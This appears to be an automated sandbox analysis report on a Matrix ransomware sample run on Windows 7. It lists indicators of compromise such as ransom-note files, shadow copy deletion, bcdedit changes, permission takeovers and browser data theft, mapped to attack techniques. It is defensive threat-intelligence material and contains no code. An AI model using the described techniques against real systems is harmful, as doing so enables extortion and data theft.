matrix | 226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6

Analysis

max time kernel
4294181s
max time network
123s
platform
windows7_x64
resource
win7-20220223-en
submitted
05-03-2022 18:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
Size

1.2MB
MD5

82ad6beb400743eab16ff8f9d5a0f8ba
SHA1

82f6d54c4f49746b0387803165171222d0ae1c44
SHA256

226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6
SHA512

b386ecf6174347c2fe55c97137b14a83fdf0a5c54af901c641ad568154ffb1e9f38f01c1b47f46ddcf0d3cb3bf6aad2e146eda8d48dfd4cbd629963ebf32774d

Score

10^/10

matrix discovery evasion persistence ransomware spyware stealer upx

Malware Config

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

description	ioc	Process
File created	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\Java\jre7\lib\jfr\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\Microsoft Games\Solitaire\fr-FR\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Users\Admin\Contacts\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\Microsoft Games\Mahjong\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\Microsoft Games\Mahjong\es-ES\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Users\Public\Downloads\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Users\Public\Music\Sample Music\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\Java\jre7\bin\server\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\Microsoft Games\Minesweeper\fr-FR\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Users\Admin\Favorites\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\Java\jre7\lib\zi\Africa\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\Microsoft Games\Multiplayer\Backgammon\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\Cache\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\VideoLAN\VLC\lua\meta\art\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\Microsoft Games\Chess\de-DE\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\Microsoft Games\Multiplayer\Checkers\en-US\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Users\Admin\AppData\Local\Adobe\Color\Profiles\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files (x86)\Google\Update\Install\{C37A708D-DC6D-463F-83FF-F612E3CFF06F}\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\ProgramData\Package Cache\{E30D8B21-D82D-3211-82CC-0F0A5D1495E8}v12.0.40660\packages\vcRuntimeMinimum_x86\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Users\All Users\Microsoft\Assistance\Client\1.0\it-IT\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\Java\jdk1.7.0_80\include\win32\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\ProgramData\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
1544	bcdedit.exe
1384	bcdedit.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	CnRDNN7F64.exe

Executes dropped EXE 64 IoCs

pid	Process
2028	NWE1ahVz.exe
2004	CnRDNN7F.exe
1152	CnRDNN7F64.exe
1964	CnRDNN7F.exe
1416	CnRDNN7F.exe
824	CnRDNN7F.exe
1684	CnRDNN7F.exe
832	CnRDNN7F.exe
736	CnRDNN7F.exe
872	CnRDNN7F.exe
1772	CnRDNN7F.exe
1544	CnRDNN7F.exe
820	CnRDNN7F.exe
1528	CnRDNN7F.exe
1084	CnRDNN7F.exe
748	CnRDNN7F.exe
1544	CnRDNN7F.exe
1484	CnRDNN7F.exe
964	CnRDNN7F.exe
596	CnRDNN7F.exe
512	CnRDNN7F.exe
968	CnRDNN7F.exe
1408	CnRDNN7F.exe
1084	CnRDNN7F.exe
364	CnRDNN7F.exe
1520	CnRDNN7F.exe
2028	CnRDNN7F.exe
1620	CnRDNN7F.exe
272	CnRDNN7F.exe
1484	CnRDNN7F.exe
1528	CnRDNN7F.exe
872	CnRDNN7F.exe
480	CnRDNN7F.exe
1772	CnRDNN7F.exe
272	CnRDNN7F.exe
1160	CnRDNN7F.exe
512	CnRDNN7F.exe
872	CnRDNN7F.exe
1680	CnRDNN7F.exe
1772	CnRDNN7F.exe
1104	CnRDNN7F.exe
1112	CnRDNN7F.exe
1108	CnRDNN7F.exe
2028	CnRDNN7F.exe
1980	CnRDNN7F.exe
1640	CnRDNN7F.exe
1580	CnRDNN7F.exe
1904	CnRDNN7F.exe
364	CnRDNN7F.exe
1384	CnRDNN7F.exe
1128	CnRDNN7F.exe
1408	CnRDNN7F.exe
652	CnRDNN7F.exe
452	CnRDNN7F.exe
824	CnRDNN7F.exe
1860	CnRDNN7F.exe
1484	CnRDNN7F.exe
1968	CnRDNN7F.exe
480	CnRDNN7F.exe
2028	CnRDNN7F.exe
776	CnRDNN7F.exe
1904	CnRDNN7F.exe
1104	CnRDNN7F.exe
204	CnRDNN7F.exe

Modifies extensions of user files 2 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\OpenSync.tiff	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Users\Admin\Pictures\SwitchRead.tiff	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe

Sets service image path in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 55 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0006000000015c62-63.dat	upx
behavioral1/files/0x0006000000015c62-64.dat	upx
behavioral1/files/0x0006000000015c62-65.dat	upx
behavioral1/files/0x0006000000015c62-69.dat	upx
behavioral1/files/0x0006000000015c62-70.dat	upx
behavioral1/files/0x0006000000015c62-72.dat	upx
behavioral1/files/0x0006000000015c62-73.dat	upx
behavioral1/files/0x0006000000015c62-76.dat	upx
behavioral1/files/0x0006000000015c62-77.dat	upx
behavioral1/files/0x0006000000015c62-79.dat	upx
behavioral1/files/0x0006000000015c62-80.dat	upx
behavioral1/files/0x0006000000015c62-82.dat	upx
behavioral1/files/0x0006000000015c62-83.dat	upx
behavioral1/files/0x0006000000015c62-85.dat	upx
behavioral1/files/0x0006000000015c62-86.dat	upx
behavioral1/files/0x0006000000015c62-89.dat	upx
behavioral1/files/0x0006000000015c62-88.dat	upx
behavioral1/files/0x0006000000015c62-91.dat	upx
behavioral1/files/0x0006000000015c62-92.dat	upx
behavioral1/files/0x0006000000015c62-94.dat	upx
behavioral1/files/0x0006000000015c62-95.dat	upx
behavioral1/files/0x0006000000015c62-97.dat	upx
behavioral1/files/0x0006000000015c62-98.dat	upx
behavioral1/files/0x0006000000015c62-100.dat	upx
behavioral1/files/0x0006000000015c62-101.dat	upx
behavioral1/files/0x0006000000015c62-103.dat	upx
behavioral1/files/0x0006000000015c62-104.dat	upx
behavioral1/files/0x0006000000015c62-106.dat	upx
behavioral1/files/0x0006000000015c62-107.dat	upx
behavioral1/files/0x0006000000015c62-109.dat	upx
behavioral1/files/0x0006000000015c62-110.dat	upx
behavioral1/files/0x0006000000015c62-112.dat	upx
behavioral1/files/0x0006000000015c62-113.dat	upx
behavioral1/files/0x0006000000015c62-115.dat	upx
behavioral1/files/0x0006000000015c62-116.dat	upx
behavioral1/files/0x0006000000015c62-118.dat	upx
behavioral1/files/0x0006000000015c62-119.dat	upx
behavioral1/files/0x0006000000015c62-121.dat	upx
behavioral1/files/0x0006000000015c62-122.dat	upx
behavioral1/files/0x0006000000015c62-124.dat	upx
behavioral1/files/0x0006000000015c62-125.dat	upx
behavioral1/files/0x0006000000015c62-127.dat	upx
behavioral1/files/0x0006000000015c62-128.dat	upx
behavioral1/files/0x0006000000015c62-130.dat	upx
behavioral1/files/0x0006000000015c62-131.dat	upx
behavioral1/files/0x0006000000015c62-133.dat	upx
behavioral1/files/0x0006000000015c62-134.dat	upx
behavioral1/files/0x0006000000015c62-137.dat	upx
behavioral1/files/0x0006000000015c62-136.dat	upx
behavioral1/files/0x0006000000015c62-140.dat	upx
behavioral1/files/0x0006000000015c62-139.dat	upx
behavioral1/files/0x0006000000015c62-143.dat	upx
behavioral1/files/0x0006000000015c62-142.dat	upx
behavioral1/files/0x0006000000015c62-145.dat	upx
behavioral1/files/0x0006000000015c62-146.dat	upx

Loads dropped DLL 64 IoCs

pid	Process
1208	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
1208	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
1692	cmd.exe
2004	CnRDNN7F.exe
1544	cmd.exe
684	cmd.exe
916	cmd.exe
1972	cmd.exe
2036	cmd.exe
452	cmd.exe
1416	cmd.exe
788	cmd.exe
1108	cmd.exe
648	cmd.exe
1664	cmd.exe
480	cmd.exe
1176	cmd.exe
2036	cmd.exe
776	cmd.exe
1416	cmd.exe
480	cmd.exe
1896	cmd.exe
1560	cmd.exe
748	cmd.exe
648	cmd.exe
1112	cmd.exe
1544	cmd.exe
1140	cmd.exe
776	cmd.exe
968	cmd.exe
1112	cmd.exe
1092	cmd.exe
684	cmd.exe
1192	cmd.exe
1860	cmd.exe
1200	cmd.exe
1108	cmd.exe
968	cmd.exe
1980	cmd.exe
1988	cmd.exe
1380	cmd.exe
956	cmd.exe
1372	cmd.exe
1564	cmd.exe
1168	cmd.exe
512	cmd.exe
1704	cmd.exe
1680	cmd.exe
956	cmd.exe
1620	cmd.exe
1564	cmd.exe
788	cmd.exe
512	cmd.exe
732	cmd.exe
2036	cmd.exe
1656	cmd.exe
1772	cmd.exe
384	cmd.exe
1896	cmd.exe
1176	cmd.exe
1520	cmd.exe
596	cmd.exe
648	cmd.exe
820	cmd.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1580	takeown.exe
648	takeown.exe
1580	Process not Found
1600	Process not Found
224	takeown.exe
648	takeown.exe
1524	takeown.exe
1656	Process not Found
964	takeown.exe
872	takeown.exe
232	Process not Found
432	Process not Found
452	Process not Found
1904	takeown.exe
592	takeown.exe
596	takeown.exe
736	Process not Found
2032	Process not Found
788	Process not Found
648	Process not Found
648	takeown.exe
748	takeown.exe
1580	takeown.exe
1176	Process not Found
684	Process not Found
1588	takeown.exe
1656	Process not Found
748	Process not Found
776	Process not Found
512	takeown.exe
1384	takeown.exe
1640	takeown.exe
1680	takeown.exe
1588	Process not Found
1968	Process not Found
1972	takeown.exe
1804	takeown.exe
1176	takeown.exe
1596	Process not Found
1680	takeown.exe
384	takeown.exe
1636	Process not Found
968	takeown.exe
596	takeown.exe
2028	takeown.exe
956	Process not Found
1560	takeown.exe
1140	takeown.exe
208	takeown.exe
968	takeown.exe
1524	takeown.exe
1384	Process not Found
952	Process not Found
968	takeown.exe
964	takeown.exe
1168	takeown.exe
232	takeown.exe
1248	takeown.exe
1704	Process not Found
1524	Process not Found
2036	Process not Found
1596	Process not Found
364	takeown.exe
1896	takeown.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Drops desktop.ini file(s) 41 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Microsoft Games\Solitaire\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Microsoft Games\Mahjong\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\M7YMRK48\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Users\Admin\Favorites\Links for United States\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\72C1GWO9\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Users\Public\Recorded TV\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Users\Public\Videos\Sample Videos\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Users\Public\Music\Sample Music\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Users\Public\Pictures\Sample Pictures\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Microsoft Games\Chess\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Microsoft Games\Hearts\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Users\Public\Recorded TV\Sample Media\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Users\Public\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Microsoft Games\FreeCell\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Microsoft Games\Purble Place\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\AZW6OKHO\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\AGWPI80M\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

